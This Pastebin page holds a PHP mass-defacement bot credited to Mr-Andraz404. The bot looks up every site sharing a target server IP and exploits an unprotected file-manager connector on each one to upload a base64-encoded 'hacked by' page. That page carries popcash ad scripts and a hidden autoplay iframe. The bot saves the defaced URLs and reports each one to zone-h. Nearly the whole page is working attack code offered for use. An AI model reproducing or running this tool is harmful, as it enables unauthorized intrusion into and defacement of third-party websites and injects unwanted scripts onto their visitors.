API tools faq
paste
mrandraz404

Naz

mrandraz404
Mar 22nd, 2017
76
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.64 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. @ini_set('output_buffering',0);
  3. @ini_set('display_errors', 0);
  4. print " \n";
  5. print " [ ============================================= ]\n";
  6. print " Bot Auto Tusbol Hosting Nazuka / IDhostinger\n";
  7. print " - Auto save success (/xampp/php/hasil.txt)\n";
  8. print " - Reverse Ip\n";
  9. print " Coded by: zafk1el ( yuzuriha inori )\n";
  10. print " Recode by: Mr-Andraz404 ( 1ntr0ver7_Tersakiti )\n";
  11. print " Greetz: IndoXploit - Mr.MaGnoM - LinuxSec\n";
  12. print " [ ============================================= ]\n\n";
  13. $zh = "Mr-Andraz404"; // zone-h nick
  14. /*---------------------------*/
  15. function getsource($url,$post=null) {
  16. $ch = curl_init($url);
  17. if($post != null) {
  18. curl_setopt($ch, CURLOPT_POST, true);
  19. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  20. }
  21. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  22. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
  23. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  24. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  25. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  26. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  27. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  28. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  29. return curl_exec($ch);
  30. curl_close($ch);
  31. }
  32. function ngirim($url, $isi){
  33. $ch = curl_init ("$url");
  34. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  35. curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  36. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  37. curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  38. curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  39. curl_setopt ($ch, CURLOPT_POST, 1);
  40. curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
  41. curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  42. curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  43. $data3 = curl_exec ($ch);
  44. return $data3;
  45. }
  46. echo "Server Target IP : ";
  47. $ip=trim(fgets(STDIN,1024));
  48. $sth = "http://domains.yougetsignal.com/domains.php";
  49. $ch = curl_init($sth);
  50. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  51. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$ip&ket=");
  52. curl_setopt($ch, CURLOPT_HEADER, 0);
  53. curl_setopt($ch, CURLOPT_POST, 1);
  54. $resp = curl_exec($ch);
  55. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  56. $array = explode(",,", $resp);
  57. unset($array[0]);
  58. echo "\n\t Total site loaded : ".count($array)."\n\n";
  59.  
  60. foreach($array as $site)
  61. {
  62. $_SESSION[$site] = "1";
  63. // set var all site + path to x
  64. $domain1 = "http://$site"; // URL TARGET
  65. $domain_exploit = $domain1."/_file-manager/php/connector.php"; // URL to Exploit
  66. $target = $domain_exploit;
  67. $kaori = "1T.php";
  68. $pwnz= "$domain1/$kaori";
  69. $isi_kaori = "PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KdmFyIHVpZCA9ICcxNDE1NDMnOw0KdmFyIHdpZCA9ICcyOTYzNzUnOw0KPC9zY3JpcHQ+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSIvL2Nkbi5wb3BjYXNoLm5ldC9wb3AuanMiPjwvc2NyaXB0Pg0KPGh0bWw+PGhlYWQ+IA0KPCEtLSBJdCdzIFNob3d0aW1lLiAtLT4NCjx0aXRsZT5oYWNrZWQgYnkgTXItQW5kcmF6NDA0PC90aXRsZT4NCjxsaW5rIHJlbD0ic2hvcnRjdXQgaWNvbiIgaHJlZj0iaHR0cHM6Ly93d3cuZXVyb21hbmFnZW1lbnQuY28uaWQvbG9nbzF0LnBuZyIgLz4NCjxsaW5rIGhyZWY9J2h0dHA6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M/ZmFtaWx5PU9yYml0cm9uOjcwMCcgcmVsPSdzdHlsZXNoZWV0JyB0eXBlPSd0ZXh0L2Nzcyc+DQo8bWV0YSBuYW1lPSJBdXRob3IiIGNvbnRlbnQ9Ik1yLUFuZHJhejQwNCIvPg0KPG1ldGEgbmFtZT0iY29weXJpZ2h0IiBjb250ZW50PSJNci1BbmRyYXo0MDQiLz4NCjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJoYWNrZWQgQnkgTXItQW5kcmF6NDA0Ii8+DQo8bWV0YSBuYW1lPSJrZXl3b3JkcyIgY29udGVudD0iTXItQW5kcmF6NDA0LCBoYWNrZWQgYnkgTXItQW5kcmF6NDA0Ii8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6dGl0bGUiIGNvbnRlbnQ9In4vICcgaGFja2VkIGJ5IE1yLUFuZHJhejQwNCAnIH4vIi8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6aW1hZ2UiIGNvbnRlbnQ9Imh0dHA6Ly9kZXRyb2l0dGFnLm9yZy9kZXZpbC5naWYiPg0KPG1ldGEgbmFtZT0ib2c6dGl0bGUiIGNvbnRlbnQ9Ik1yLUFuZHJhejQwNCIvPg0KPG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJhbGwiLz4NCjxtZXRhIG5hbWU9Imdvb2dsZWJvdCIgY29udGVudD0iYXV0byIvPg0KPG1ldGEgbmFtZT0iZGlzdHJpYnV0aW9uIiBjb250ZW50PSJnbG9iYWwiLz4NCg0KPGxpbmsgaHJlZj0iaHR0cDovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9TWVncmltIiByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIj4NCjxsaW5rIGhyZWY9Imh0dHA6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M/ZmFtaWx5PVF1aWNrc2FuZCIgcmVsPSJzdHlsZXNoZWV0IiB0eXBlPSJ0ZXh0L2NzcyI+DQo8YmFzZSB0YXJnZXQ9J19ibGFuaycvPiANCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4NCnZhciB1aWQgPSAnMTQxNTQzJzsNCnZhciB3aWQgPSAnMjk2Mzc1JzsNCjwvc2NyaXB0Pg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iLy9jZG4ucG9wY2FzaC5uZXQvcG9wLmpzIj48L3NjcmlwdD4NCjwvaGVhZD4NCjxib2R5IGJnY29sb3I9ImJsYWNrIj4gDQo8dGFibGUgd2lkdGg9MTAwJSBoZWlnaHQ9MTAwJT4NCjx0ZCBhbGlnbj1jZW50ZXI+DQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+DQp2YXIgdWlkID0gJzE0MTU0Myc7DQp2YXIgd2lkID0gJzI5NjM3NSc7DQo8L3NjcmlwdD4NCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Ii8vY2RuLnBvcGNhc2gubmV0L3BvcC5qcyI+PC9zY3JpcHQ+DQo8Y2VudGVyPg0KPHN0eWxlPg0KKnsNCiAgbWFyZ2luLXRvcDoxcHg7DQp9DQpoMXsNCiAgZm9udC1mYW1pbHk6T3JiaXRyb247DQogIGNvbG9yOiNGRkZGRkY7DQogIHRleHQtc2hhZG93OiAwIDAgM3B4IGJsYWNrLCAwcHggMHB4IDBweCBncmVlbjsNCn0NCiNwbGF0ZXsNCiAgICBwb3NpdGlvbjogYWJzb2x1dGU7IWltcG9ydGFudDsNCiAgICB0b3A6MCFpbXBvcnRhbnQ7DQogICAgbGVmdDowOw0KICAgIHJpZ2h0OjA7DQogICAgd2lkdGg6MTAwJTsNCiAgICBoZWlnaHQ6MTAwJTsNCiAgICB6LWluZGV4Oi0xICFpbXBvcnRhbnQ7DQogICAgbWFyZ2luOjA7DQogICAgcGFkZGluZzowOw0KICAgIHBvc2l0aW9uOmZpeGVkOw0KICBiYWNrZ3JvdW5kLWNvbG9yOnJnYmEoMCwgMCwgMCwgMC4xOCk7DQp9DQpoMnsNCiAgICBmb250LWZhbWlseTpPcmJpdHJvbjsNCiAgICAvKmNvbG9yOiNBNTA2MDQ7Ki8NCiAgICBjb2xvcjojMDAwMDAwOw0KICAgIHRleHQtc2hhZG93OiAwIDAgM3B4IGN5YW4sIDBweCAwcHggMHB4IGN5YW47DQogICAgZm9udC1zaXplOiAxNDAlOw0KfQ0KaDF7DQogICAgZm9udC1mYW1pbHk6T3JiaXRyb247DQogICAgLypjb2xvcjojQTUwNjA0OyovDQogICAgY29sb3I6IzAwMDAwMDsNCiAgICB0ZXh0LXNoYWRvdzogMCAwIDNweCBjeWFuLCAwcHggMHB4IDBweCBjeWFuOw0KICAgIGZvbnQtc2l6ZTogMTQwJTsNCn0NCiNmb3RlciB7DQogICAgcG9zaXRpb246IGZpeGVkOw0KICAgIGxlZnQ6IDBweDsNCiAgICByaWdodDogMHB4Ow0KICAgIGJvdHRvbTogM3B4Ow0KICAgIGJhY2tncm91bmQ6IHRyYW5zcGFyZW50Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5mb3RlciB7DQogICAgZm9udC1mYW1pbHk6T3JiaXRyb247DQogICAgY29sb3I6ICNGRkZGRkY7DQogICAgZm9udC1zaXplOiAxMHB4Ow0KICAgIHRleHQtdHJhbnNmb3JtOiB1cHBlcmNhc2U7DQogICAgdGV4dC1zaGFkb3c6IDBweCAwcHggMHB4IGN5YW47DQp9DQouZm90ZXIgc3BhbnsNCiAgdGV4dC1hbGlnbjogY2VudGVyOw0KICAgIGZvbnQtZmFtaWx5OiBPcmJpdHJvbjsNCiAgICBmb250LXNpemU6IDMwMCU7DQogICAgY29sb3I6ICNBNTA2MDQ7DQogICAgdGV4dC1zaGFkb3c6IDAgMCAzcHggY3lhbiwgMHB4IDBweCAzMHB4IGN5YW47DQp9DQpoM3sNCiAgICBmb250LWZhbWlseTpPcmJpdHJvbjsNCiAgICAvKmNvbG9yOiNBNTA2MDQ7Ki8NCiAgICBjb2xvcjojMDAwMDAwOw0KICAgIHRleHQtc2hhZG93OiAwIDAgM3B4IGN5YW4sIDBweCAwcHggMHB4IGN5YW47DQogICAgZm9udC1zaXplOiAxNDAlOw0KfQ0KI2NvdmVyew0KICBoZWlnaHQ6MTAwJTsNCiAgd2lkdGg6MTAwJTsNCiAgcG9zaXRpb246Zml4ZWQ7DQp9DQojc2VjIHNwYW57DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCiAgICBmb250LWZhbWlseTogJ0NvdXJpZXIgTmV3JzsNCiAgICBmb250LXNpemU6IDMwMCU7DQogICAgY29sb3I6ICNBNTA2MDQ7DQogICAgdGV4dC1zaGFkb3c6IDAgMCAzcHggYmxhY2ssIDBweCAwcHggMHB4IGN5YW47DQp9DQojc2VjOmhvdmVyew0KICBjb2xvcjojMDAwMDAwOw0KICB0ZXh0LXNoYWRvdzogMCAwIDNweCBjeWFuLCAwcHggMHB4IDBweCBjeWFuOw0KfQ0KI2ljb257DQogICAgd2lkdGg6IDIwJTsNCn0NCjwvc3R5bGU+DQo8Zm9udCBjb2xvcj0icmVkIiBmYWNlPSJPcmJpdHJvbiIgc2l6ZT0iMTIiPg0KPGI+PHNwYW4gaWQ9IjFudHIwdmVyN19UZXJzYWtpdGkiPjxzcGFuIGlkPSJzZWMiPls8L3NwYW4+PHNwYW4gaWQ9InNlYyI+IG88L3NwYW4+PHNwYW4gaWQ9InNlYyI+dzwvc3Bhbj48c3BhbiBpZD0ic2VjIj5uPC9zcGFuPjxzcGFuIGlkPSJzZWMiPmU8L3NwYW4+PHNwYW4gaWQ9InNlYyI+ZDwvc3Bhbj48c3BhbiBpZD0ic2VjIj4gYjwvc3Bhbj48c3BhbiBpZD0ic2VjIj55PC9zcGFuPjxzcGFuIGlkPSJzZWMiPiBNPC9zcGFuPjxzcGFuIGlkPSJzZWMiPnI8L3NwYW4+PHNwYW4gaWQ9InNlYyI+LTwvc3Bhbj48c3BhbiBpZD0ic2VjIj5BPC9zcGFuPjxzcGFuIGlkPSJzZWMiPm48L3NwYW4+PHNwYW4gaWQ9InNlYyI+ZDwvc3Bhbj48c3BhbiBpZD0ic2VjIj5yPC9zcGFuPjxzcGFuIGlkPSJzZWMiPmE8L3NwYW4+PHNwYW4gaWQ9InNlYyI+ejwvc3Bhbj48c3BhbiBpZD0ic2VjIj40PC9zcGFuPjxzcGFuIGlkPSJzZWMiPjA8L3NwYW4+PHNwYW4gaWQ9InNlYyI+NDwvc3Bhbj48c3BhbiBpZD0iMW50cjB2ZXI3X1RlcnNha2l0aSI+PHNwYW4gaWQ9InNlYyI+IF08L3NwYW4+PC9zcGFuPjwvc3Bhbj48L2I+PC9mb250Pg0KPGJyPg0KPGJyPg0KPGltZyBzcmM9Imh0dHBzOi8vd3d3LmV1cm9tYW5hZ2VtZW50LmNvLmlkL2xvZ28xdC5wbmciPg0KPHByZT4NCjwvcHJlPjxmb250IGNvbG9yPSIjODAwMDAwIiBmYWNlPSJRdWlja3NhbmQiIHNpemU9IjYiPg0KPCEtLSBoYWNrZWQgYnkgTXItQW5kcmF6NDA0IC0tPg0KPGlmcmFtZSB3aWR0aD0iMSIgaGVpZ2h0PSIxIiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vZW1iZWQvdDByZG90Wjh1emc/cmVsPTAmYXV0b3BsYXk9MSZsb29wPTEmcGxheWxpc3Q9dDByZG90Wjh1emciIGZyYW1lYm9yZGVyPSIwIiBhbGxvd2Z1bGxzY3JlZW4+PC9pZnJhbWU+DQo8YnI+PGZvbnQgc2l6ZT0iNCI+PiBXZSBBcmU8L2ZvbnQ+PGJyPjxmb250IGNvbG9yPSJjeWFuIiBzaXplPSIzIj58IDVpTk9OIU1PVTIzIHwgTXItQW5kcmF6NDA0IHwgTUlTNzNSTEFONCB8IEZ4X0ZyaTNuZHNfIHwgLi9Nci5IYW56SUQgfCAuL01yLkJsYW5rMDA3IHwgLi9NaXN0ZXItWTQwNCB8IE1yLk96IHwgQWt1U2loQ3VlazQwNC0gfCBNci5DcmFicyB8PC9mb250Pg0KPGJyPjxmb250IHNpemU9IjQiPj4gR3JlZXR6PC9mb250Pjxicj48Zm9udCBjb2xvcj0iY3lhbiIgc2l6ZT0iMyI+fCBBbm9hR2hvc3QgfCBCMU40UlkgfCBBbm9uY3liZXI0MDMgfCBXYWxrZXJzNDA0IHwgLi9Nci5Sb2JvdCB8IC4vI01yLlgtOCB8DQo8YnI+fCAuLi8wOHp2ZCB8IFBoYW50b21oaXZlNDA0IHwgU2VyaXphd2E0MDQgfCBNci4gMTMzNE4gfCAuL01yLmdyZWV0ejY5IHwgUG9zZWlEb24gfCBKb21ibG9IaXR6IHw8L2ZvbnQ+DQo8L2NlbnRlcj48L3RkPjwvZm9udD48L2NlbnRlcj48L3RkPjwvdGFibGU+DQogICA8L2JvZHk+DQo8L2h0bWw+DQo8IS0tIEl0J3MgU2hvd3RpbWUuIC0tPg==";
  70. $decode_isi = base64_decode($isi_kaori);
  71. $encode = base64_encode($kaori);
  72.  
  73. $fp = fopen($kaori,"w");
  74. fputs($fp, $decode_isi);
  75. echo "\n# $domain1\n# Try exploit...\n";
  76. $url_mkfile = "$target?cmd=mkfile&name=$kaori&target=l1_Lw";
  77. $b = file_get_contents("$url_mkfile");
  78.  
  79. $post1 = array(
  80. "cmd" => "put",
  81. "target" => "l1_$encode",
  82. "content" => "$decode_isi",
  83.  
  84. );
  85.  
  86. $output_mkfile = ngirim("$target", $post1);
  87. if(preg_match("/$kaori/", $output_mkfile)){
  88. echo "Exploit success => $kaori\nUrl : $pwnz\n";
  89. $f = fopen('hasil.txt', 'ab');
  90.  
  91. fwrite($f, "{$pwnz}\r\n");
  92.  
  93. echo "[+] zone-h: ";
  94. $ch3 = curl_init ("http://www.zone-h.com/notify/single");
  95. curl_setopt ($ch3, CURLOPT_RETURNTRANSFER, 1);
  96. curl_setopt ($ch3, CURLOPT_POST, 1);
  97. curl_setopt ($ch3, CURLOPT_POSTFIELDS, "defacer=$zh&domain1=$pwnz&hackmode=1&reason=1");
  98.  
  99. if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch3))){
  100. echo " OK - notified by $zh \n";}
  101. else{
  102. echo " Error \n";
  103. }
  104. }
  105.  
  106. else{
  107. echo "Exploit failed\n\n";
  108. }
  109. }
  110. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!